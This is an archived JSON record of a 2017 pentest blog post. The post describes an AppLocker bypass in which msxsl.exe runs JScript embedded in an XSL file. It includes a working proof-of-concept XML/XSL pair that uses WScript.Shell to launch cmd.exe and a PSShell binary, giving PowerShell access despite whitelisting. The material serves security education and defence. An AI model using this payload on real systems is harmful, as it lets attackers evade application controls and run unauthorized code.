{ "id": "cc1e3501-afc6-43aa-80ac-9616c24a00ab", "created_at": "2026-04-06T01:31:42.406602Z", "updated_at": "2026-04-10T13:12:18.33964Z", "deleted_at": null, "sha1_hash": "b03ee48f9a28552bd673a19f8ab37dba5a6108ff", "title": "AppLocker Bypass โ€“ MSXSL", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 82917, "plain_text": "AppLocker Bypass โ€“ MSXSL\r\nPublished: 2017-07-06 ยท Archived: 2026-04-06 00:34:32 UTC\r\nSkip to content\r\nAccording to Microsoft the msxsl.exe command line utility enables the user to perform command line Extensible\r\nStylesheet Language (XSL) transformations by using the Microsoft XSL processor. However this binary can be\r\nused execute malicious JavaScript code and bypass application whitelisting protections. This was discovered by\r\nCasey Smith and proof of concept was shared with the community over twitter.\r\nThe msxsl utility accepts XML and XSL files. The following needs to be executed from the command line in order\r\nto run JavaScript code:\r\n1 msxsl.exe customers.xml script.xsl\r\ncustomers.xml\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n\u003c?xml version= \"1.0\" ?\u003e\r\n\u003c?xml-stylesheet type= \"text/xsl\" href= \"script.xsl\" ?\u003e\r\n\u003ccustomers\u003e\r\n\u003ccustomer\u003e\r\n\u003cname\u003eMicrosoft\u003c/name\u003e\r\n\u003c/customer\u003e\r\n\u003c/customers\u003e\r\nscript.xsl\r\n1\r\n2\r\n3\r\n4\r\n5\r\n\u003c?xml version= '1.0' ?\u003e\r\n\u003cxsl:stylesheet version= \"1.0\"\r\nxmlns:msxsl= \"urn:schemas-microsoft-com:xslt\"\r\n\u003cmsxsl:script language= \"JScript\" implements-prefix= \"user\" \u003e\r\nfunction xml(nodelist) {\r\nhttps://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/\r\nPage 1 of 3\n\n6\n7\n8\n9\n10\n11\n12\n13\n14\n15\n16\n17\nvar r = new ActiveXObject( \"WScript.Shell\" ).Run( \"cmd.exe /k C:\\\\PSShell.exe\" );\nreturn nodelist.nextNode().xml;\n}\n\nThe utility needs to be run from a location on the system that the user has permission to execute. The same applies\nand for the untrusted binary PSShell which will provide PowerShell access even if PowerShell has been blocked\nby AppLocker.\nAppLocker Bypass โ€“ msxsl\nhttps://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/\nPage 2 of 3\n\nPowerShell via MSXSL\r\nPost navigation\r\nSource: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/\r\nhttps://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE" ], "origins": [ "web" ], "references": [ "https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/" ], "report_names": [ "applocker-bypass-msxsl" ], "threat_actors": [], "ts_created_at": 1775439102, "ts_updated_at": 1775826738, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b03ee48f9a28552bd673a19f8ab37dba5a6108ff.pdf", "text": "https://archive.orkl.eu/b03ee48f9a28552bd673a19f8ab37dba5a6108ff.txt", "img": "https://archive.orkl.eu/b03ee48f9a28552bd673a19f8ab37dba5a6108ff.jpg" } }